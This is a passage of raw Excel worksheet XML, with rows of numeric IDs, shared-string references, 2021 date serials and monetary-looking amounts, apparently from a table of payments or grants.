        <v>12255</v>
      </c>
      <c r="G3693" s="1">
        <v>44242</v>
      </c>
      <c r="H3693">
        <v>1500</v>
      </c>
      <c r="I3693" t="s">
        <v>12971</v>
      </c>
      <c r="J3693" t="s">
        <v>12972</v>
      </c>
    </row>
    <row r="3694" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3694">
        <v>23929</v>
      </c>
      <c r="B3694">
        <v>1308</v>
      </c>
      <c r="C3694" t="s">
        <v>3022</v>
      </c>
      <c r="D3694" t="s">
        <v>9503</v>
      </c>
      <c r="E3694">
        <v>11</v>
      </c>
      <c r="F3694" t="s">
        <v>12973</v>
      </c>
      <c r="G3694" s="1">
        <v>44270</v>
      </c>
      <c r="H3694">
        <v>30000</v>
      </c>
      <c r="J3694" t="s">
        <v>11145</v>
      </c>
    </row>
    <row r="3695" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3695">
        <v>23930</v>
      </c>
      <c r="B3695">
        <v>1308</v>
      </c>
      <c r="C3695" t="s">
        <v>3022</v>
      </c>
      <c r="D3695" t="s">
        <v>9503</v>
      </c>
      <c r="E3695">
        <v>11</v>
      </c>
      <c r="F3695" t="s">
        <v>3814</v>
      </c>
      <c r="G3695" s="1">
        <v>44270</v>
      </c>
      <c r="H3695">
        <v>10000</v>
      </c>
      <c r="J3695" t="s">
        <v>11145</v>
      </c>
    </row>
    <row r="3696" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3696">
        <v>23931</v>
      </c>
      <c r="B3696">
        <v>1308</v>
      </c>
      <c r="C3696" t="s">
        <v>3022</v>
      </c>
      <c r="D3696" t="s">
        <v>9503</v>
      </c>
      <c r="E3696">
        <v>11</v>
      </c>
      <c r="F3696" t="s">
        <v>12974</v>
      </c>
      <c r="G3696" s="1">
        <v>44270</v>
      </c>
      <c r="H3696">
        <v>30000</v>
      </c>
      <c r="J3696" t="s">
        <v>11145</v>
      </c>
    </row>
    <row r="3697" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3697">
        <v>23932</v>
      </c>
      <c r="B3697">
        <v>1308</v>
      </c>
      <c r="C3697" t="s">
        <v>3022</v>
      </c>
      <c r="D3697" t="s">
        <v>9503</v>
      </c>
      <c r="E3697">
        <v>11</v>
      </c>
      <c r="F3697" t="s">
        <v>12975</v>
      </c>
      <c r="G3697" s="1">
        <v>44270</v>
      </c>
      <c r="H3697">
        <v>10000</v>
      </c>
      <c r="J3697" t="s">
        <v>11145</v>
      </c>
    </row>
    <row r="3698" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3698">
        <v>23933</v>
      </c>
      <c r="B3698">
        <v>1308</v>
      </c>
      <c r="C3698" t="s">
        <v>3022</v>
      </c>
      <c r="D3698" t="s">
        <v>9503</v>
      </c>
      <c r="E3698">
        <v>11</v>
      </c>
      <c r="F3698" t="s">
        <v>9675</v>
      </c>
      <c r="G3698" s="1">
        <v>44270</v>
      </c>
      <c r="H3698">
        <v>30000</v>
      </c>
      <c r="J3698" t="s">
        <v>11145</v>
      </c>
    </row>
    <row r="3699" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3699">
        <v>23934</v>
      </c>
      <c r="B3699">
        <v>1308</v>
      </c>
      <c r="C3699" t="s">
        <v>3022</v>
      </c>
      <c r="D3699" t="s">
        <v>9503</v>
      </c>
      <c r="E3699">
        <v>11</v>
      </c>
      <c r="F3699" t="s">
        <v>9928</v>
      </c>
      <c r="G3699" s="1">
        <v>44270</v>
      </c>
      <c r="H3699">
        <v>10000</v>
      </c>
      <c r="J3699" t="s">
        <v>11145</v>
      </c>
    </row>
    <row r="3700" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3700">
        <v>23935</v>
      </c>
      <c r="B3700">
        <v>1308</v>
      </c>
      <c r="C3700" t="s">
        <v>3022</v>
      </c>
      <c r="D3700" t="s">
        <v>9503</v>
      </c>
      <c r="E3700">
        <v>11</v>
      </c>
      <c r="F3700" t="s">
        <v>12976</v>
      </c>
      <c r="G3700" s="1">
        <v>44270</v>
      </c>
      <c r="H3700">
        <v>50000</v>
      </c>
      <c r="J3700" t="s">
        <v>11145</v>
      </c>
    </row>
    <row r="3701" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3701">
        <v>23936</v>
      </c>
      <c r="B3701">
        <v>1308</v>
      </c>
      <c r="C3701" t="s">
        <v>3022</v>
      </c>
      <c r="D3701" t="s">
        <v>9503</v>
      </c>
      <c r="E3701">
        <v>11</v>
      </c>
      <c r="F3701" t="s">
        <v>9455</v>
      </c>
      <c r="G3701" s="1">
        <v>44270</v>
      </c>
      <c r="H3701">
        <v>10000</v>
      </c>
      <c r="J3701" t="s">
        <v>11145</v>
      </c>
    </row>
    <row r="3702" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3702">
        <v>23938</v>
      </c>
      <c r="B3702">
        <v>2591</v>
      </c>
      <c r="C3702" t="s">
        <v>4977</v>
      </c>
      <c r="D3702" t="s">
        <v>12071</v>
      </c>
      <c r="E3702">
        <v>16</v>
      </c>
      <c r="F3702" t="s">
        <v>9561</v>
      </c>
      <c r="G3702" s="1">
        <v>44267</v>
      </c>
      <c r="H3702">
        <v>500</v>
      </c>
      <c r="I3702" t="s">
        <v>12977</v>
      </c>
    </row>
    <row r="3703" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3703">
        <v>23939</v>
      </c>
      <c r="B3703">
        <v>2591</v>
      </c>
      <c r="C3703" t="s">
        <v>4977</v>
      </c>
      <c r="D3703" t="s">
        <v>12071</v>
      </c>
      <c r="E3703">
        <v>16</v>
      </c>
      <c r="F3703" t="s">
        <v>10309</v>
      </c>
      <c r="G3703" s="1">
        <v>44267</v>
      </c>
      <c r="H3703">
        <v>750</v>
      </c>
      <c r="I3703" t="s">
        <v>12978</v>
      </c>
    </row>
    <row r="3704" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3704">
        <v>23940</v>
      </c>
      <c r="B3704">
        <v>2591</v>
      </c>
      <c r="C3704" t="s">
        <v>4977</v>
      </c>
      <c r="D3704" t="s">
        <v>12071</v>
      </c>
      <c r="E3704">
        <v>16</v>
      </c>
      <c r="F3704" t="s">
        <v>9435</v>
      </c>
      <c r="G3704" s="1">
        <v>44267</v>
      </c>
      <c r="H3704">
        <v>500</v>
      </c>
      <c r="I3704" t="s">
        <v>12979</v>
      </c>
    </row>
    <row r="3705" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3705">
        <v>23941</v>
      </c>
      <c r="B3705">
        <v>2591</v>
      </c>
      <c r="C3705" t="s">
        <v>4977</v>
      </c>
      <c r="D3705" t="s">
        <v>12071</v>
      </c>
      <c r="E3705">
        <v>16</v>
      </c>
      <c r="F3705" t="s">
        <v>9438</v>
      </c>
      <c r="G3705" s="1">
        <v>44267</v>
      </c>
      <c r="H3705">
        <v>20000</v>
      </c>
      <c r="I3705" t="s">
        <v>12980</v>
      </c>
    </row>
    <row r="3706" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3706">
        <v>23942</v>
      </c>
      <c r="B3706">
        <v>2591</v>
      </c>
      <c r="C3706" t="s">
        <v>4977</v>
      </c>
      <c r="D3706" t="s">
        <v>12071</v>
      </c>
      <c r="E3706">
        <v>16</v>
      </c>
      <c r="F3706" t="s">
        <v>1746</v>
      </c>
      <c r="G3706" s="1">
        <v>44267</v>
      </c>
      <c r="H3706">
        <v>500</v>
      </c>
      <c r="I3706" t="s">
        <v>12981</v>
      </c>
    </row>
    <row r="3707" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3707">
        <v>23943</v>
      </c>
      <c r="B3707">
        <v>2591</v>
      </c>
      <c r="C3707" t="s">
        <v>4977</v>
      </c>
      <c r="D3707" t="s">
        <v>12071</v>
      </c>
      <c r="E3707">
        <v>16</v>
      </c>
      <c r="F3707" t="s">
        <v>2924</v>
      </c>
      <c r="G3707" s="1">
        <v>44267</v>
      </c>
      <c r="H3707">
        <v>100000</v>
      </c>
      <c r="I3707" t="s">
        <v>12982</v>
      </c>
    </row>
    <row r="3708" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3708">
        <v>23944</v>
      </c>
      <c r="B3708">
        <v>2591</v>
      </c>
      <c r="C3708" t="s">
        <v>4977</v>
      </c>
      <c r="D3708" t="s">
        <v>12071</v>
      </c>
      <c r="E3708">
        <v>16</v>
      </c>
      <c r="F3708" t="s">
        <v>12983</v>
      </c>
      <c r="G3708" s="1">
        <v>44267</v>
      </c>
      <c r="H3708">
        <v>500</v>
      </c>
      <c r="I3708" t="s">
        <v>12984</v>
      </c>
    </row>
    <row r="3709" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3709">
        <v>23945</v>
      </c>
      <c r="B3709">
        <v>1198</v>
      </c>
      <c r="C3709" t="s">
        <v>4217</v>
      </c>
      <c r="D3709" t="s">
        <v>12985</v>
      </c>
      <c r="E3709">
        <v>29</v>
      </c>
      <c r="F3709" t="s">
        <v>4686</v>
      </c>
      <c r="G3709" s="1">
        <v>44256</v>
      </c>
      <c r="H3709">
        <v>50000</v>
      </c>
      <c r="J3709" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3710" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3710">
        <v>23946</v>
      </c>
      <c r="B3710">
        <v>1198</v>
      </c>
      <c r="C3710" t="s">
        <v>4217</v>
      </c>
      <c r="D3710" t="s">
        <v>12985</v>
      </c>
      <c r="E3710">
        <v>29</v>
      </c>
      <c r="F3710" t="s">
        <v>6917</v>
      </c>
      <c r="G3710" s="1">
        <v>44256</v>
      </c>
      <c r="H3710">
        <v>5000</v>
      </c>
      <c r="J3710" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3711" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3711">
        <v>23947</v>
      </c>
      <c r="B3711">
        <v>1198</v>
      </c>
      <c r="C3711" t="s">
        <v>4217</v>
      </c>
      <c r="D3711" t="s">
        <v>12985</v>
      </c>
      <c r="E3711">
        <v>29</v>
      </c>
      <c r="F3711" t="s">
        <v>2236</v>
      </c>
      <c r="G3711" s="1">
        <v>44256</v>
      </c>
      <c r="H3711">
        <v>200000</v>
      </c>
      <c r="J3711" t="s">
        <v>9679</v>
      </c>
    </row>
    <row r="3712" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3712">
        <v>23950</v>
      </c>
      <c r="B3712">
        <v>5258</v>
      </c>
      <c r="C3712" t="s">
        <v>7012</v>
      </c>
      <c r="D3712" t="s">
        <v>12986</v>
      </c>
      <c r="E3712">
        <v>13</v>
      </c>
      <c r="F3712" t="s">
        <v>385</v>
      </c>
      <c r="G3712" s="1">
        <v>44246</v>
      </c>
      <c r="H3712">
        <v>540000</v>
      </c>
      <c r="J3712" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="3713" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3713">
        <v>23951</v>
      </c>
      <c r="B3713">
        <v>1437</v>
      </c>
      <c r="C3713" t="s">
        <v>4150</v>
      </c>
      <c r="D3713" t="s">
        <v>12987</v>
      </c>
      <c r="E3713">
        <v>24</v>
      </c>
      <c r="F3713" t="s">
        <v>609</v>
      </c>
      <c r="G3713" s="1">
        <v>44284</v>
      </c>
      <c r="H3713">
        <v>1250000</v>
      </c>
      <c r="I3713" t="s">
        <v>9693</v>
      </c>
      <c r="J3713" t="s">
        <v>9509</v>
      </c>
    </row>
    <row r="3714" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3714">
        <v>23952</v>
      </c>
      <c r="B3714">
        <v>1195</v>
      </c>
      <c r="C3714" t="s">
        <v>4015</v>
      </c>
      <c r="D3714" t="s">
        <v>12766</v>
      </c>
      <c r="E3714">
        <v>16</v>
      </c>
      <c r="F3714" t="s">
        <v>9523</v>
      </c>
      <c r="G3714" s="1">
        <v>44223</v>
      </c>
      <c r="H3714">
        <v>2000</v>
      </c>
      <c r="J3714" t="s">
        <v>12988</v>
      </c>
    </row>
    <row r="3715" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3715">
        <v>23953</v>
      </c>
      <c r="B3715">
        <v>5254</v>
      </c>
      <c r="C3715" t="s">
        <v>588</v>
      </c>
      <c r="D3715" t="s">
        <v>12989</v>
      </c>
      <c r="E3715">
        <v>19</v>
      </c>
      <c r="F3715" t="s">
        <v>12990</v>
      </c>
      <c r="G3715" s="1">
        <v>44256</v>
      </c>
      <c r="H3715">
        <v>800000</v>
      </c>
      <c r="I3715" t="s">
        <v>12991</v>
      </c>
      <c r="J3715" t="s">
        <v>11874</v>
      </c>
    </row>
    <row r="3716" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3716">
        <v>23954</v>
      </c>
      <c r="B3716">
        <v>5254</v>
      </c>
      <c r="C3716" t="s">
        <v>588</v>
      </c>
      <c r="D3716" t="s">
        <v>12989</v>
      </c>
      <c r="E3716">
        <v>19</v>
      </c>
      <c r="F3716" t="s">
        <v>2236</v>
      </c>
      <c r="G3716" s="1">
        <v>44256</v>
      </c>
      <c r="H3716">
        <v>30000</v>
      </c>
      <c r="I3716" t="s">
        <v>12991</v>
      </c>
      <c r="J3716" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="3717" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3717">
        <v>23956</v>
      </c>
      <c r="B3717">
        <v>42</v>
      </c>
      <c r="C3717" t="s">
        <v>16506</v>
      </c>
      <c r="D3717" t="s">
        <v>16507</v>
      </c>
      <c r="E3717">
        <v>12</v>
      </c>
      <c r="F3717" t="s">
        <v>12992</v>
      </c>
      <c r="G3717" s="1">
        <v>44231</v>
      </c>
      <c r="H3717" s="4">
        <v>85000</v>
      </c>
      <c r="J3717" t="s">
        <v>12744</v>
      </c>
    </row>
    <row r="3718" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3718">
        <v>23960</v>
      </c>
      <c r="B3718">
        <v>124</v>
      </c>
      <c r="C3718" t="s">
        <v>2260</v>
      </c>
      <c r="D3718" t="s">
        <v>12993</v>
      </c>
      <c r="E3718">
        <v>12</v>
      </c>
      <c r="F3718" t="s">
        <v>2236</v>
      </c>
      <c r="G3718" s="1">
        <v>44274</v>
      </c>
      <c r="H3718">
        <v>230000</v>
      </c>
      <c r="J3718" t="s">
        <v>12994</v>
      </c>
    </row>
    <row r="3719" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3719">
        <v>23962</v>
      </c>
      <c r="B3719">
        <v>1487</v>
      </c>
      <c r="C3719" t="s">
        <v>4240</v>
      </c>
      <c r="D3719" t="s">
        <v>11438</v>
      </c>
      <c r="E3719">
        <v>14</v>
      </c>
      <c r="F3719" t="s">
        <v>3076</v>
      </c>
      <c r="G3719" s="1">
        <v>44309</v>
      </c>
      <c r="H3719">
        <v>2500000</v>
      </c>
      <c r="J3719" t="s">
        <v>12995</v>
      </c>
    </row>
    <row r="3720" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3720">
        <v>23963</v>
      </c>
      <c r="B3720">
        <v>1487</v>
      </c>
      <c r="C3720" t="s">
        <v>4240</v>
      </c>
      <c r="D3720" t="s">
        <v>11438</v>
      </c>
      <c r="E3720">
        <v>14</v>
      </c>
      <c r="F3720" t="s">
        <v>12996</v>
      </c>
      <c r="G3720" s="1">
        <v>44309</v>
      </c>
      <c r="H3720">
        <v>2500000</v>
      </c>
      <c r="I3720" t="s">
        <v>12997</v>
      </c>
    </row>
    <row r="3721" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3721">
        <v>23964</v>
      </c>
      <c r="B3721">
        <v>1487</v>
      </c>
      <c r="C3721" t="s">
        <v>4240</v>
      </c>
      <c r="D3721" t="s">
        <v>11438</v>
      </c>
      <c r="E3721">
        <v>14</v>
      </c>
      <c r="F3721" t="s">
        <v>1455</v>
      </c>
      <c r="G3721" s="1">
        <v>44309</v>
      </c>
      <c r="H3721">
        <v>1500000</v>
      </c>
      <c r="I3721" t="s">
        <v>9536</v>
      </c>
      <c r="J3721" t="s">
        <v>12998</v>
      </c>
    </row>
    <row r="3722" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3722">
        <v>23965</v>
      </c>
      <c r="B3722">
        <v>1487</v>
      </c>
      <c r="C3722" t="s">
        <v>4240</v>
      </c>
      <c r="D3722" t="s">
        <v>11438</v>
      </c>
      <c r="E3722">
        <v>14</v>
      </c>
      <c r="F3722" t="s">
        <v>9435</v>
      </c>
      <c r="G3722" s="1">
        <v>44309</v>
      </c>
      <c r="H3722">
        <v>10000</v>
      </c>
      <c r="I3722" t="s">
        <v>9436</v>
      </c>
    </row>
    <row r="3723" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3723">
        <v>23967</v>
      </c>
      <c r="B3723">
        <v>1487</v>
      </c>
      <c r="C3723" t="s">
        <v>4240</v>
      </c>
      <c r="D3723" t="s">
        <v>11438</v>
      </c>
      <c r="E3723">
        <v>14</v>
      </c>
      <c r="F3723" t="s">
        <v>9469</v>
      </c>
      <c r="G3723" s="1">
        <v>44309</v>
      </c>
      <c r="H3723">
        <v>10000</v>
      </c>
      <c r="I3723" t="s">
        <v>9436</v>
      </c>
    </row>
    <row r="3724" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3724">
        <v>23973</v>
      </c>
      <c r="B3724">
        <v>5039</v>
      </c>
      <c r="C3724" t="s">
        <v>8435</v>
      </c>
      <c r="D3724" t="s">
        <v>12999</v>
      </c>
      <c r="E3724">
        <v>16</v>
      </c>
      <c r="F3724" t="s">
        <v>1746</v>
      </c>
      <c r="G3724" s="1">
        <v>44281</v>
      </c>
      <c r="H3724">
        <v>0</v>
      </c>
      <c r="I3724" t="s">
        <v>13000</v>
      </c>
    </row>
    <row r="3725" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3725">
        <v>23974</v>
      </c>
      <c r="B3725">
        <v>5039</v>
      </c>
      <c r="C3725" t="s">
        <v>8435</v>
      </c>
      <c r="D3725" t="s">
        <v>12999</v>
      </c>
      <c r="E3725">
        <v>16</v>
      </c>
      <c r="F3725" t="s">
        <v>10421</v>
      </c>
      <c r="G3725" s="1">
        <v>44281</v>
      </c>
      <c r="H3725">
        <v>0</v>
      </c>
      <c r="I3725" t="s">
        <v>13001</v>
      </c>
    </row>
    <row r="3726" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3726">
        <v>23975</v>
      </c>
      <c r="B3726">
        <v>5039</v>
      </c>
      <c r="C3726" t="s">
        <v>8435</v>
      </c>
      <c r="D3726" t="s">
        <v>12999</v>
      </c>
      <c r="E3726">
        <v>16</v>
      </c>
      <c r="F3726" t="s">
        <v>3814</v>
      </c>
      <c r="G3726" s="1">
        <v>44281</v>
      </c>
      <c r="H3726">
        <v>0</v>
      </c>
      <c r="I3726" t="s">
        <v>13002</v>
      </c>
    </row>
    <row r="3727" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3727">
        <v>23976</v>
      </c>
      <c r="B3727">
        <v>5039</v>
      </c>
      <c r="C3727" t="s">
        <v>8435</v>
      </c>
      <c r="D3727" t="s">
        <v>12999</v>
      </c>
      <c r="E3727">
        <v>16</v>
      </c>
      <c r="F3727" t="s">
        <v>9561</v>
      </c>
      <c r="G3727" s="1">
        <v>44281</v>
      </c>
      <c r="H3727">
        <v>0</v>
      </c>
      <c r="I3727" t="s">
        <v>13002</v>
      </c>
    </row>
    <row r="3728" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3728">
        <v>23977</v>
      </c>
      <c r="B3728">
        <v>5039</v>
      </c>
      <c r="C3728" t="s">
        <v>8435</v>
      </c>
      <c r="D3728" t="s">
        <v>12999</v>
      </c>
      <c r="E3728">
        <v>16</v>
      </c>
      <c r="F3728" t="s">
        <v>609</v>
      </c>
      <c r="G3728" s="1">
        <v>44281</v>
      </c>
      <c r="H3728">
        <v>0</v>
      </c>
      <c r="I3728" t="s">
        <v>13000</v>
      </c>
    </row>
    <row r="3729" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3729">
        <v>23989</v>
      </c>
      <c r="B3729">
        <v>5131</v>
      </c>
      <c r="C3729" t="s">
        <v>8127</v>
      </c>
      <c r="D3729" t="s">
        <v>13003</v>
      </c>
      <c r="E3729">
        <v>17</v>
      </c>
      <c r="F3729" t="s">
        <v>9561</v>
      </c>
      <c r="G3729" s="1">
        <v>44232</v>
      </c>
      <c r="H3729">
        <v>400000</v>
      </c>
      <c r="I3729" t="s">
        <v>9550</v>
      </c>
      <c r="J3729" t="s">
        <v>10040</v>
      </c>
    </row>
    <row r="3730" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3730">
        <v>23990</v>
      </c>
      <c r="B3730">
        <v>1619</v>
      </c>
      <c r="C3730" t="s">
        <v>4247</v>
      </c>
      <c r="D3730" t="s">
        <v>13004</v>
      </c>
      <c r="E3730">
        <v>13</v>
      </c>
      <c r="F3730" t="s">
        <v>3673</v>
      </c>
      <c r="G3730" s="1">
        <v>44287</v>
      </c>
      <c r="H3730">
        <v>120000</v>
      </c>
      <c r="J3730" t="s">
        <v>10018</v>
      </c>
    </row>
    <row r="3731" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3731">
        <v>23991</v>
      </c>
      <c r="B3731">
        <v>466</v>
      </c>
      <c r="C3731" t="s">
        <v>2175</v>
      </c>
      <c r="D3731" t="s">
        <v>13005</v>
      </c>
      <c r="E3731">
        <v>15</v>
      </c>
      <c r="F3731" t="s">
        <v>13006</v>
      </c>
      <c r="G3731" s="1">
        <v>44252</v>
      </c>
      <c r="H3731">
        <v>1000</v>
      </c>
      <c r="I3731" t="s">
        <v>13007</v>
      </c>
    </row>
    <row r="3732" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3732">
        <v>23992</v>
      </c>
      <c r="B3732">
        <v>138</v>
      </c>
      <c r="C3732" t="s">
        <v>2010</v>
      </c>
      <c r="D3732" t="s">
        <v>12306</v>
      </c>
      <c r="E3732">
        <v>12</v>
      </c>
      <c r="F3732" t="s">
        <v>13008</v>
      </c>
      <c r="G3732" s="1">
        <v>44265</v>
      </c>
      <c r="H3732">
        <v>0</v>
      </c>
      <c r="I3732" t="s">
        <v>12926</v>
      </c>
    </row>
    <row r="3733" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3733">
        <v>23994</v>
      </c>
      <c r="B3733">
        <v>438</v>
      </c>
      <c r="C3733" t="s">
        <v>2264</v>
      </c>
      <c r="D3733" t="s">
        <v>13009</v>
      </c>
      <c r="E3733">
        <v>15</v>
      </c>
      <c r="F3733" t="s">
        <v>5647</v>
      </c>
      <c r="G3733" s="1">
        <v>44252</v>
      </c>
      <c r="H3733">
        <v>500</v>
      </c>
      <c r="I3733" t="s">
        <v>13010</v>
      </c>
    </row>
    <row r="3734" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3734">
        <v>23995</v>
      </c>
      <c r="B3734">
        <v>438</v>
      </c>
      <c r="C3734" t="s">
        <v>2264</v>
      </c>
      <c r="D3734" t="s">
        <v>13009</v>
      </c>
      <c r="E3734">
        <v>15</v>
      </c>
      <c r="F3734" t="s">
        <v>13011</v>
      </c>
      <c r="G3734" s="1">
        <v>44252</v>
      </c>
      <c r="H3734">
        <v>700</v>
      </c>
      <c r="I3734" t="s">
        <v>13012</v>
      </c>
    </row>
    <row r="3735" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3735">
        <v>23996</v>
      </c>
      <c r="B3735">
        <v>438</v>
      </c>
      <c r="C3735" t="s">
        <v>2264</v>
      </c>
      <c r="D3735" t="s">
        <v>13013</v>
      </c>
      <c r="E3735">
        <v>15</v>
      </c>
      <c r="F3735" t="s">
        <v>11051</v>
      </c>
      <c r="G3735" s="1">
        <v>44252</v>
      </c>
      <c r="H3735">
        <v>600</v>
      </c>
      <c r="I3735" t="s">
        <v>13014</v>
      </c>
    </row>
    <row r="3736" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3736">
        <v>23997</v>
      </c>
      <c r="B3736">
        <v>1240</v>
      </c>
      <c r="C3736" t="s">
        <v>2554</v>
      </c>
      <c r="D3736" t="s">
        <v>13015</v>
      </c>
      <c r="E3736">
        <v>1</v>
      </c>
      <c r="F3736" t="s">
        <v>9438</v>
      </c>
      <c r="G3736" s="1">
        <v>44230</v>
      </c>
      <c r="H3736">
        <v>0</v>
      </c>
      <c r="I3736" t="s">
        <v>13016</v>
      </c>
      <c r="J3736" t="s">
        <v>13017</v>
      </c>
    </row>
    <row r="3737" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3737">
        <v>23998</v>
      </c>
      <c r="B3737">
        <v>5291</v>
      </c>
      <c r="C3737" t="s">
        <v>8450</v>
      </c>
      <c r="D3737" t="s">
        <v>13018</v>
      </c>
      <c r="E3737">
        <v>2</v>
      </c>
      <c r="F3737" t="s">
        <v>13019</v>
      </c>
      <c r="G3737" s="1">
        <v>44286</v>
      </c>
      <c r="H3737">
        <v>50000</v>
      </c>
      <c r="I3737" t="s">
        <v>9550</v>
      </c>
      <c r="J3737" t="s">
        <v>9555</v>
      </c>
    </row>
    <row r="3738" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3738">
        <v>23999</v>
      </c>
      <c r="B3738">
        <v>5291</v>
      </c>
      <c r="C3738" t="s">
        <v>8450</v>
      </c>
      <c r="D3738" t="s">
        <v>13018</v>
      </c>
      <c r="E3738">
        <v>2</v>
      </c>
      <c r="F3738" t="s">
        <v>13020</v>
      </c>
      <c r="G3738" s="1">
        <v>44286</v>
      </c>
      <c r="H3738">
        <v>50000</v>
      </c>
      <c r="I3738" t="s">
        <v>13021</v>
      </c>
      <c r="J3738" t="s">
        <v>10780</v>
      </c>
    </row>
    <row r="3739" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3739">
        <v>24000</v>
      </c>
      <c r="B3739">
        <v>5291</v>
      </c>
      <c r="C3739" t="s">
        <v>8450</v>
      </c>
      <c r="D3739" t="s">
        <v>13018</v>
      </c>
      <c r="E3739">
        <v>2</v>
      </c>
      <c r="F3739" t="s">
        <v>9437</v>
      </c>
      <c r="G3739" s="1">
        <v>44286</v>
      </c>
      <c r="H3739">
        <v>150000</v>
      </c>
      <c r="J3739" t="s">
        <v>9555</v>
      </c>
    </row>
    <row r="3740" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3740">
        <v>24001</v>
      </c>
      <c r="B3740">
        <v>929</v>
      </c>
      <c r="C3740" t="s">
        <v>16464</v>
      </c>
      <c r="D3740" t="s">
        <v>16465</v>
      </c>
      <c r="E3740">
        <v>16</v>
      </c>
      <c r="F3740" t="s">
        <v>13022</v>
      </c>
      <c r="G3740" s="1">
        <v>44337</v>
      </c>
      <c r="H3740" s="4">
        <v>360000</v>
      </c>
      <c r="I3740" t="s">
        <v>13023</v>
      </c>
      <c r="J3740" t="s">
        <v>11797</v>
      </c>
    </row>
    <row r="3741" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3741">
        <v>24002</v>
      </c>
      <c r="B3741">
        <v>929</v>
      </c>
      <c r="C3741" t="s">
        <v>16464</v>
      </c>
      <c r="D3741" t="s">
        <v>16465</v>
      </c>
      <c r="E3741">
        <v>16</v>
      </c>
      <c r="F3741" t="s">
        <v>13024</v>
      </c>
      <c r="G3741" s="1">
        <v>44337</v>
      </c>
      <c r="H3741" s="4">
        <v>360000</v>
      </c>
      <c r="I3741" t="s">
        <v>13023</v>
      </c>
      <c r="J3741" t="s">
        <v>11797</v>
      </c>
    </row>
    <row r="3742" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3742">
        <v>24003</v>
      </c>
      <c r="B3742">
        <v>929</v>
      </c>
      <c r="C3742" t="s">
        <v>16464</v>
      </c>
      <c r="D3742" t="s">
        <v>16465</v>
      </c>
      <c r="E3742">
        <v>16</v>
      </c>
      <c r="F3742" t="s">
        <v>9437</v>
      </c>
      <c r="G3742" s="1">
        <v>44337</v>
      </c>
      <c r="H3742" s="4">
        <v>360000</v>
      </c>
      <c r="I3742" t="s">
        <v>13023</v>
      </c>
      <c r="J3742" t="s">
        <v>11797</v>
      </c>
    </row>
    <row r="3743" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3743">
        <v>24004</v>
      </c>
      <c r="B3743">
        <v>929</v>
      </c>
      <c r="C3743" t="s">
        <v>16464</v>
      </c>
      <c r="D3743" t="s">
        <v>16465</v>
      </c>
      <c r="E3743">
        <v>16</v>
      </c>
      <c r="F3743" t="s">
        <v>764</v>
      </c>
      <c r="G3743" s="1">
        <v>44337</v>
      </c>
      <c r="H3743" s="4">
        <v>360000</v>
      </c>
      <c r="I3743" t="s">
        <v>13025</v>
      </c>
      <c r="J3743" t="s">
        <v>11797</v>
      </c>
    </row>
    <row r="3744" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3744">
        <v>24005</v>
      </c>
      <c r="B3744">
        <v>929</v>
      </c>
      <c r="C3744" t="s">
        <v>16464</v>
      </c>
      <c r="D3744" t="s">
        <v>16465</v>
      </c>
      <c r="E3744">
        <v>16</v>
      </c>
      <c r="F3744" t="s">
        <v>9642</v>
      </c>
      <c r="G3744" s="1">
        <v>44337</v>
      </c>
      <c r="H3744" s="4">
        <v>360000</v>
      </c>
      <c r="I3744" t="s">
        <v>13023</v>
      </c>
      <c r="J3744" t="s">
        <v>11797</v>
      </c>
    </row>
    <row r="3745" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3745">
        <v>24006</v>
      </c>
      <c r="B3745">
        <v>2367</v>
      </c>
      <c r="C3745" t="s">
        <v>6093</v>
      </c>
      <c r="D3745" t="s">
        <v>13026</v>
      </c>
      <c r="E3745">
        <v>11</v>
      </c>
      <c r="F3745" t="s">
        <v>9459</v>
      </c>
      <c r="G3745" s="1">
        <v>44287</v>
